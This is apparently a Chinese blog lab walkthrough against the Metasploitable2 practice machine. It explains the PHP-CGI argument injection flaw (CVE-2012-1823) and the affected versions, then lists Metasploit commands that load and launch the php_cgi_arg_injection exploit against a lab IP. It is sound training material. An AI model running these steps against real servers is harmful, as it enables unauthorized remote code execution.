Metasploitable2靶机之第十篇--PHP CGI参数注入执行漏洞（cve-2012-1823）

最新推荐文章于 2025-02-09 22:28:10 发布

星球守护者

最新推荐文章于 2025-02-09 22:28:10 发布

阅读量1.8k

点赞数

分类专栏： Metasploit使用详解文章标签： Metasploitable2 PHP CGI参数注入执行 cve-2012-1823

本文链接：https://blog.csdn.net/qq_41901122/article/details/115408996

版权

Metasploit使用详解专栏收录该内容

22 篇文章

订阅专栏

文章目录

环境

主机	地址
Metasploitable2	192.168.232.202
kali-linux	192.168.232.129

原理

用户请求的querystring被作为了php-cgi的参数，最终导致了一系列结果。
探究一下原理，RFC3875中规定，当querystring中不包含没有解码的=号的情况下，要将querystring作为cgi的参数传入。
所以，Apache服务器按要求实现了这个功能。
apache在解析.php文件时会把接收到的url参数通过mod_cgi模块交给后端的php-cgi处理,而传递过程中未对参数进行过滤,导致php-cgi会把用户输入当作php参数执行

影响版本

php < 5.3.12
php < 5.4.2

漏洞利用

第一步，启动MSF

msfconsole

在这里插入图片描述

第二步选择漏洞库

use exploit/multi/http/php_cgi_arg_injection

在这里插入图片描述

第三步设置参数，开始攻击

show options
Set RHOST 192.168.160.131 设置要攻击的IP
exploit

在这里插入图片描述

第四步利用成功，

在这里插入图片描述

摘抄

抛开内心的阴霾，天气回暖，春天回归，

一切都会越来越好。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

星球守护者

关注关注

0
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

PHP-CGI远程代码执行漏洞（CVE-2012-1823）

千寻的博客

03-06

1314

就是用户请求的`querystring`（`querystring`字面上的意思就是查询字符串，一般是对http请求所带的数据进行解析，这里也是指http请求中所带的数据）被作为了`php-cgi`的参数，最终导致了一系列结果。

CVE-2024-4577：PHP CGI Windows平台远程代码执行漏洞

薛定谔嘚喵博客

06-11

513

PHP语言在设计时忽略了Windows系统内部对字符编码转换的Best-Fit特性，当PHP运行在Window平台且使用了如繁体中文(代码页950)、简体中文(代码页936)和日文(代码页932)等语系时，威胁者可构造恶意请求绕过CVE-2012-1823的保护，通过参数注入等攻击在目标PHP服务器上远程执行代码。

参与评论您还未登录，请先登录后发表或查看评论

网络安全80端口—-PHP CGI参数注入执行漏洞

旺仔Sec&blog

07-24

1453

80——-PHP CGI参数注入执行漏洞

CVE-2012-1823

最新发布

Dikesi的博客

02-09

1045

PHP-CGI远程代码执行漏洞

vulhub靶场php环境下的CVE-2012-1823（PHP-CGI远程代码执行漏洞）

m0_73248913的博客

02-12

562

msf解决vulhub

【CVE-2024-4577】PHP CGI 远程代码执行漏洞

qq_21039641的博客

06-08

2385

PHP 语言在设计时忽略Windows 作业系统内部对字元编码转换的Best-Fit特性，导致未认证的攻击者可透过特定的字元序列绕过旧有。的保护，透过参数注入等攻击在远端PHP 服务器上执行任意代码。

PHP-CGI远程代码执行漏洞分析与防范

12-20

CVE-2012-1823出来时据说是“PHP远程代码执行漏洞”，曾经也“轰动一时”，当时的我只是刚踏入安全门的一个小菜，直到前段时间tomato师傅让我看一个案例，我才想起来这个漏洞。通过在 Vulhub 中对这个漏洞环境的搭建与漏洞原理的分析，我觉得还挺有意思的，故写出一篇文章来，和大家分享。首先，介绍一下PHP的运行模式。下载PHP源码，可以看到其中有个目录叫sapi。sapi在PHP中的作用，类似于一个消息的“传递者”，比如我在《 Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写》一文中介绍的fpm，他的作用就是接受Web容器通过fastcgi协议封装

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052（CVE-2017-9805）

qq_51577576的博客

12-15

1750

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052（CVE-2017-9805） Apache Struts2的REST插件存在远程代码执行的高危漏洞，其编号为CVE-2017-9805（S2-052）。Struts2 REST插件的XStream组件存在反序列化漏洞，使用XStream组件对XML格式的数据包进行反序列化操作时，未对数据内容进行有效验证，存在安全隐患，可被远程攻击。

[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)

qq_51577576的博客

03-12

2277

[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839) WebLogic是美商Oracle的主要产品之一，系购并得来。是商业市场上主要的Java应用服务器软件之一，是世界上第一个成功商业化的J2EE应用服务器，目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件，以及OEPE开发工具。

PHP-CGI远程代码执行漏洞

weixin_69925635的博客

07-18

784

使用kali-msf6对ubuntu的php-CGI漏洞攻击

kali linux攻击靶机Metasploitable2实验------vsFTPd手工触发漏洞

边城浪子的博客

07-27

1316

漏洞：vsftpd手工出发漏洞：当进行FTP认证时，如果用户名USER中包含:)，那么直接就触发监听6200端口的连接的shell。靶机：Metasploitable2 step1:开启kali linux 和 Metasploitable2 step2:扫描漏洞命令：nmap --script vuln 目标ip nmap --script vuln -p 21192.168.5...

一次成功的cgi漏洞入侵

04-19

网站安全包括许多方面，尽管网管们千方百计的防范于未然，可有时还是难免疏漏。我的“再谈cgi漏洞攻击”一文中，我利用cgi漏洞攻进几台服务器，这次我将以一次，从发现漏洞到利用漏洞，从而攻进主机的全过程来讲解，与大家交流。

（CVE-2012-1823）PHP-CGI远程代码执行漏洞（80端口）

m0_62670778的博客

05-12

872

php-cgi是一个类似于消息的“传递者”，它接收web容器收到的http数据包，并把里面的数据交给PHP解释器执行php-cgi有两个功能，一是提供cgi方式的交互，二是提供fastcgi方式的交互cgi方式：web容器接收到http数据包后，拿到用户请求的文件（cgi脚本），并fork除一个子进程（解释器）去执行这个文件，然后拿到执行结果，直接返回给用户，然后子进程结束，但是这个cgi模式不能接收同时接收大量的请求，因为创建进程的时候会消耗服务器资源，资源也不是无限的，所以有了fastcgi。

metasploit中php_cgi,kali渗透metasploitable靶机

weixin_33783273的博客

03-18

322

扫描阶段：工具：Nmap隐蔽扫描 nmap -sS 192.168.8.135端口爆破：FTP、SSH等工具：Hydra备用字典爆破FTPhydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt ftp://192.168.8.135爆破SSHhydra -L /root/Desktop/user.txt -P /...

php-cgi漏洞,PHP-CGI远程代码执行漏洞（CVE-2012-1823）

weixin_36023909的博客

03-24

860

PHP-CGI远程代码执行漏洞(CVE-2012-1823)漏洞分析PHP SAPI 与运行模式在PHP源码中，有一个目录叫sapi。sapi在PHP中的作用，类似一个消息的“传递者”，(PHP-FPM中的fpm，其作用就是接受web容器通过fastcgi协议封装好的数据，交给PHP解释器执行；除了fpm，最常见的sapi应该是用于Apache的mod_php，这个sapi用于php和apache...

PHP CGI Argument Injection

cnbird's blog

05-06

1788

CVE ID: CVE-2012-1823 PHP是一种HTML内嵌式的语言，PHP与微软的ASP颇有几分相似，都是一种在服务器端执行的嵌入HTML文档的脚本语言，语言的风格有类似于C语言，现在被很多的网站编程人员广泛的运用。可以被各种Web服务器以多种方式调用，实现动态网页的功能。 PHP处理参数的传递时存在漏洞，在特定的配置情况下，远程攻击者可能利用此漏洞在服务器上获取脚本源码或执

metasploitable2靶场漏洞总结（部分）

leavrow的博客

08-17

3715

部分metasploitable2渗透靶场漏洞，有很多漏洞都过时了

渗透之——Metasploit攻击PHP-CGI查询字符串参数漏洞并渗透内网

冰河的专栏

01-12

3433

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/86357792 攻击机：Kali 192.168.109.137 靶机： Metasploitable2 192.168.109.159 内网另一台主机 Windows Server 2012 工具：Metasploit 目标计算机上的漏洞编号为CVE id 2012-1...

计算机网络 Web的攻击技术

许诗宇的博客

12-06

2075

目录针对Web的攻击技术 HTTP不具备必要的安全功能在客户端即可篡改请求针对Web应用的攻击模式以服务器为目标的主动攻击以服务器为目标的被动攻击因输出值转义不完全引发的安全漏洞跨站脚本攻击在动态生成HTML处发生对用户Cookie的窃取攻击 SQL注入攻击会执行非法SQL的SQL注入攻击何为SQL SQL注入攻击案例 SQL注入攻击破坏SQL语...

例举使用Nmap工具对靶机Metasploitable2-XP和Metasploitable2-Linux进行端口扫描

05-26

以下是使用Nmap工具对Metasploitable2-XP和Metasploitable2-Linux进行端口扫描的步骤： 1. 确定目标主机的IP地址。可以使用ping命令或其他工具来确定目标主机的IP地址。 2. 打开终端，输入以下命令扫描...

Metasploitable2靶机之第十篇--PHP CGI参数注入执行漏洞（cve-2012-1823）

文章目录

环境

原理

影响版本

漏洞利用

第一步 ，启动MSF

第二步选择漏洞库

第三步 设置参数，开始攻击

第四步 利用成功，

摘抄

第一步，启动MSF

第三步设置参数，开始攻击

第四步利用成功，